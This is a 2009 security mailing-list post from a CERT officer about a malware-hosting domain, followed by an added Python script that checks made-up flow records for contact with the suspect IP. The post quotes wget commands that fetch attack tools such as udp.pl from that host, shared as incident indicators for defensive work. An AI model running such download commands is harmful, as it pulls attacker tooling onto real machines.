[nsp-sec] possible malware on sharlatan.ucoz.com

SURFcert - Peter p.g.m.peters at utwente.nl
Thu Jul 2 16:11:48 EDT 2009


Rob Thomas wrote on 2009-07-02 19:53:

>> wget sharlatan.ucoz.com/spaniol.tar
>> wget sharlatan.ucoz.com/udp.pl
>> wget sharlatan.ucoz.com/udp.plw
> 
> sharlatan.ucoz.com (ha what a name!) presently resolves to
> 208.100.61.101 for me.

I see the same IP address at my end of the world.

> AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
> 32748   | 208.100.61.101   | 208.100.32.0/19     | US | arin     | 2006-02-17 | STEADFAST - NoZone, Inc.
> 
> We see 208.100.61.101 hosting malware as far back as 2009-01-01 01:31:56
> UTC (I didn't go back to 2008).  It's also sourced spam and hosted
> several phishing sites.
> 
> We see quite a few DNS RRs pointed to 208.100.61.101 last month.

So a connection to that site might indicate compromised systems? I hope
not. I checked the flows to see if somebody else downloaded the malware.
They didn't seem to, but there were a whole lot of systems just dying to
get some data.

-- 
Peter Peters
SURFcert Officer on Duty
cert at surfnet.nl                            http://cert.surfnet.nl/
office-hours: +31 302 305 305    emergency (24/7): +31 622 923 564
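A flow check of the kind Peter describes, as an added example that is not part of the thread or of any SURFcert tooling: it matches exported flow records against the IOC address from Rob's whois lines and separates hosts that actually pulled a payload from the host from those that only kept trying to connect. The CSV field layout, the bidirectional byte counters, the 1024-byte "got a payload" threshold and all sample flows are assumptions constructed for illustration (local addresses are RFC 5737 documentation space, not real SURFnet hosts).

```python
"""Added example (not from the thread): check flow records for contacts to an
IOC host and tell completed downloads apart from mere connection attempts.

Assumptions: flows are bidirectional CSV records in the constructed layout
below (nfdump/argus-style fields chosen for illustration); the sample data is
made up and uses RFC 5737 documentation addresses for the local side.
"""
import csv
import io
import ipaddress
from collections import Counter

IOC_IP = "208.100.61.101"                              # sharlatan.ucoz.com as resolved in the thread
IOC_PREFIX = ipaddress.ip_network("208.100.32.0/19")   # BGP prefix from the whois lines
DOWNLOAD_MIN_BYTES_IN = 1024                           # assumed threshold for "got a payload back"

# Constructed sample flows: ts,src,sport,dst,dport,proto,flags,pkts,bytes_out,bytes_in
SAMPLE_FLOWS = """\
ts,src,sport,dst,dport,proto,flags,pkts,bytes_out,bytes_in
2009-07-02T15:01:03,192.0.2.10,51234,208.100.61.101,80,tcp,APSF,42,1460,61237
2009-07-02T15:01:07,192.0.2.22,40211,208.100.61.101,80,tcp,S,3,180,0
2009-07-02T15:01:08,192.0.2.22,40212,208.100.61.101,80,tcp,S,3,180,0
2009-07-02T15:02:11,192.0.2.77,33001,208.100.61.101,80,tcp,S,1,60,0
2009-07-02T15:03:30,192.0.2.10,51240,208.100.40.17,80,tcp,APSF,12,900,4400
2009-07-02T15:04:00,192.0.2.1,53,198.51.100.5,53,udp,,1,78,120
"""


def parse_flows(text):
    """Parse the CSV flow export into dicts with integer port/packet/byte fields."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        for key in ("sport", "dport", "pkts", "bytes_out", "bytes_in"):
            row[key] = int(row[key])
        rows.append(row)
    return rows


def classify(flow):
    """Return 'download' for a completed TCP exchange that brought a payload back
    from the IOC host, 'attempt' for SYN-only traffic with nothing returned,
    'other' for the rest of the traffic to that host, None if not to the IOC."""
    if flow["dst"] != IOC_IP:
        return None
    if (flow["proto"] == "tcp" and "A" in flow["flags"]
            and flow["bytes_in"] >= DOWNLOAD_MIN_BYTES_IN):
        return "download"
    if flow["bytes_in"] == 0:
        return "attempt"
    return "other"


def summarize(flows):
    """Group local sources by what they did with the IOC host; also record hosts
    that reached other addresses in the same BGP prefix, which merit a second look
    given the prefix's history in the thread."""
    report = {"downloaders": set(), "attempts": Counter(),
              "other": set(), "same_prefix": set()}
    for flow in flows:
        kind = classify(flow)
        if kind == "download":
            report["downloaders"].add(flow["src"])
        elif kind == "attempt":
            report["attempts"][flow["src"]] += 1
        elif kind == "other":
            report["other"].add(flow["src"])
        elif ipaddress.ip_address(flow["dst"]) in IOC_PREFIX:
            report["same_prefix"].add(flow["src"])
    return report


if __name__ == "__main__":
    result = summarize(parse_flows(SAMPLE_FLOWS))
    print("completed downloads from", IOC_IP, ":", sorted(result["downloaders"]))
    print("connection attempts only (src -> count):", dict(result["attempts"]))
    print("other traffic to the IOC host:", sorted(result["other"]))
    print("contacted other hosts in", IOC_PREFIX, ":", sorted(result["same_prefix"]))
```

On the constructed sample, one host completed a transfer and two hosts only sent SYNs; the repeated SYN-only flows are the pattern behind "systems just dying to get some data", and a real export would need the same byte-direction check, since unidirectional flow records cannot distinguish a failed connect from a successful download.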
